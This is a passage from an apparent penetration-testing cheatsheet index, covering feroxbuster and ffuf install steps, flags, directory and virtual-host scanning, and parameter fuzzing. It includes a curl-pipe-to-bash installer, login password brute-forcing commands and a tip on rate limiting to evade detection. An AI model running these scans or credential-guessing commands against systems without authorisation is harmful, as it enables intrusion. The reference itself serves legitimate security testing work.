or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sL https://raw.githubusercontent.com/epi052/feroxbuster/main/install-nix.sh | bash\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecargo install feroxbuster\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget URL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist (default: built-in if not specified)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eThreads (default: 50)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-x \u0026lt;ext\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFile extensions to append\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRecursion depth (default: 4, 0 = unlimited)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFollow redirects\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-k\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable TLS certificate verification\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-n\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable recursion\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-C \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter out status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOnly show these status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-S \u0026lt;size\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter by response size (bytes)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-W \u0026lt;words\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter by word count in response\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-L \u0026lt;lines\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter by line count in response\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-X \u0026lt;regex\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter by response body regex\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H \u0026lt;header\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAdd custom header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-b \u0026lt;cookie\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAdd cookie\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-m \u0026lt;methods\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP methods (default: GET)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-q\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eQuiet — no banner or progress\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--json\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput as JSON\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T \u0026lt;seconds\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRequest timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--rate-limit \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMax requests per second\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;proxy\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse proxy (http/socks5)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a \u0026lt;agent\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUser-Agent string\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--dont-filter\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable wildcard filtering\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--auto-tune\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAutomatically slow down on errors\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--collect-extensions\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCollect and scan discovered extensions\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--collect-words\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBuild wordlist from responses\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--resume-from \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eResume from a saved state file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic scan with extensions\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -x php,html,txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# No recursion (flat scan)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -n\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Limit recursion depth\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -d \u003cspan style=\"color:#ae81ff\"\u003e2\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter out 404s and 403s\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -C 404,403\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Only show 200 and 301\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -s 200,301\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter responses by size (remove default page noise)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -S \u003cspan style=\"color:#ae81ff\"\u003e1234\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter by word count\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -W \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# HTTPS with TLS skip\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom headers (e.g. API auth)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Authorization: Bearer \u0026lt;token\u0026gt;\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;X-Custom: value\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use proxy (Burp Suite)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -p http://127.0.0.1:8080 -k\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# POST requests\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -m POST\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Multiple HTTP methods\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -m GET,POST,PUT\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to file (also saves state for resume)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -o results.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# JSON output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --json -o results.json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Resume interrupted scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster --resume-from ferox-\u0026lt;ip\u0026gt;.state\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Rate limit (be polite / evade detection)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --rate-limit \u003cspan style=\"color:#ae81ff\"\u003e100\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Collect extensions seen in responses and scan them too\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --collect-extensions\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Build a wordlist from page content, then use it\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --collect-words\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"virtual-host-discovery\"\u003eVirtual Host Discovery\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# feroxbuster doesn\u0026#39;t natively fuzz Host headers\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use with -H to manually set a specific host header,\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or use ffuf/gobuster for vhost fuzzing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: staging.example.com\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"interactive-pause-menu\"\u003eInteractive Pause Menu\u003c/h2\u003e\n\u003cp\u003eWhile feroxbuster is running, press \u003ccode\u003eENTER\u003c/code\u003e to open the interactive menu:\u003c/p\u003e","title":"feroxbuster"},{"content":"ffuf Cheatsheet Type: Fast web fuzzer — directory busting, virtual host discovery, parameter fuzzing, Host header fuzzing\nInstallation sudo apt install ffuf # or go install github.com/ffuf/ffuf/v2@latest Core Concept FUZZ is the keyword replaced by each wordlist entry. It can go anywhere in the request — URL path, headers, parameters, body.\nffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt Multiple keywords are supported by naming them with -w wordlist:KEYWORD:\nffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist1.txt -w params.txt:PARAM Common Flags Flag Description -u \u0026lt;url\u0026gt; Target URL (include FUZZ) -w \u0026lt;wordlist\u0026gt; Wordlist (use wordlist:KEYWORD for named) -H \u0026lt;header\u0026gt; Add/fuzz header (repeatable) -X \u0026lt;method\u0026gt; HTTP method (default: GET) -d \u0026lt;data\u0026gt; POST data body -b \u0026lt;cookie\u0026gt; Cookie string -r Follow redirects -k Skip TLS verification -t \u0026lt;n\u0026gt; Threads (default: 40) -p \u0026lt;delay\u0026gt; Delay between requests (e.g. 0.1, 0.5-1.5) -rate \u0026lt;n\u0026gt; Max requests per second -timeout \u0026lt;n\u0026gt; Request timeout in seconds -mc \u0026lt;codes\u0026gt; Match status codes (default: 200-299,301,302,307,401,403,405,500) -ms \u0026lt;size\u0026gt; Match response size -mw \u0026lt;words\u0026gt; Match word count -ml \u0026lt;lines\u0026gt; Match line count -mr \u0026lt;regex\u0026gt; Match regex in response body -fc \u0026lt;codes\u0026gt; Filter status codes -fs \u0026lt;size\u0026gt; Filter response size -fw \u0026lt;words\u0026gt; Filter word count -fl \u0026lt;lines\u0026gt; Filter line count -fr \u0026lt;regex\u0026gt; Filter regex in response body -ac Auto-calibrate filters (detects and removes false positives) -o \u0026lt;file\u0026gt; Output file -of \u0026lt;fmt\u0026gt; Output format: json, ejson, html, md, csv, all -v Verbose (show redirects, full URL) -s Silent — only results -c Colorize output -recursion Enable recursive fuzzing -recursion-depth \u0026lt;n\u0026gt; Recursion depth -e \u0026lt;exts\u0026gt; File extensions (e.g. php,html,txt) -ic Ignore wordlist comments -input-cmd \u0026lt;cmd\u0026gt; Use command output as input instead of wordlist Directory \u0026amp; File Fuzzing # Basic directory scan ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt # With file extensions ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -e .php,.html,.txt,.bak # Filter 404s ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -fc 404 # Match only 200 ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -mc 200 # Auto-calibrate (removes false positives automatically) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -ac # Recursive scanning ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -e .php # Filter by response size (remove noise) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -fs 4242 Virtual Host Discovery (Host Header Fuzzing) # Basic vhost fuzzing ffuf -u http://\u0026lt;ip\u0026gt; -H \u0026#34;Host: FUZZ.example.com\u0026#34; -w wordlist.txt # Filter default response size ffuf -u http://\u0026lt;ip\u0026gt; -H \u0026#34;Host: FUZZ.example.com\u0026#34; \\ -w wordlist.txt \\ -fs \u0026lt;default_size\u0026gt; # Auto-calibrate to remove default response ffuf -u http://\u0026lt;ip\u0026gt; -H \u0026#34;Host: FUZZ.example.com\u0026#34; \\ -w wordlist.txt \\ -ac # HTTPS ffuf -u https://\u0026lt;ip\u0026gt; -H \u0026#34;Host: FUZZ.example.com\u0026#34; \\ -w wordlist.txt \\ -k -fs \u0026lt;default_size\u0026gt; Parameter Fuzzing # GET parameter discovery ffuf -u \u0026#34;http://\u0026lt;ip\u0026gt;/page?FUZZ=value\u0026#34; -w wordlist.txt -fc 404 # GET parameter value fuzzing ffuf -u \u0026#34;http://\u0026lt;ip\u0026gt;/page?id=FUZZ\u0026#34; -w numbers.txt # POST parameter fuzzing ffuf -u http://\u0026lt;ip\u0026gt;/login \\ -X POST \\ -d \u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34; \\ -w wordlist.txt \\ -fc 401 # POST body with JSON ffuf -u http://\u0026lt;ip\u0026gt;/api/login \\ -X POST \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;FUZZ\u0026#34;}\u0026#39; \\ -w wordlist.txt Multiple Wordlists (Clusterbomb / Pitchfork) # Two keywords — try all combinations (clusterbomb) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ/W2 \\ -w wordlist.txt:FUZZ \\ -w extensions.txt:W2 # Username + password combinations ffuf -u http://\u0026lt;ip\u0026gt;/login \\ -X POST \\ -d \u0026#34;user=USER\u0026amp;pass=PASS\u0026#34; \\ -w users.txt:USER \\ -w passwords.txt:PASS \\ -fc 401 Fuzzing with Proxy (Burp Suite) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt \\ -x http://127.0.0.1:8080 -k Output # Save to file (markdown) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results.md -of md # Save as JSON ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results.json -of json # Save all formats ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results -of all Recommended Wordlists # Directories /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt /usr/share/seclists/Discovery/Web-Content/common.txt # Virtual hosts / subdomains /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt # Parameters /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt # Passwords /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt Example Full Runs # Directory + extension scan ffuf -u http://example.com/FUZZ \\ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \\ -e .php,.html,.txt,.bak \\ -ac -c -v \\ -t 50 \\ -o ffuf_dir.json -of json # Virtual host discovery ffuf -u http://example.com \\ -H \u0026#34;Host: FUZZ.example.com\u0026#34; \\ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ -ac -c \\ -t 50 \\ -o ffuf_vhost.json -of json ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/ffuf/","summary":"\u003ch1 id=\"ffuf-cheatsheet\"\u003effuf Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Fast web fuzzer — directory busting, virtual host discovery, parameter fuzzing, Host header fuzzing\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 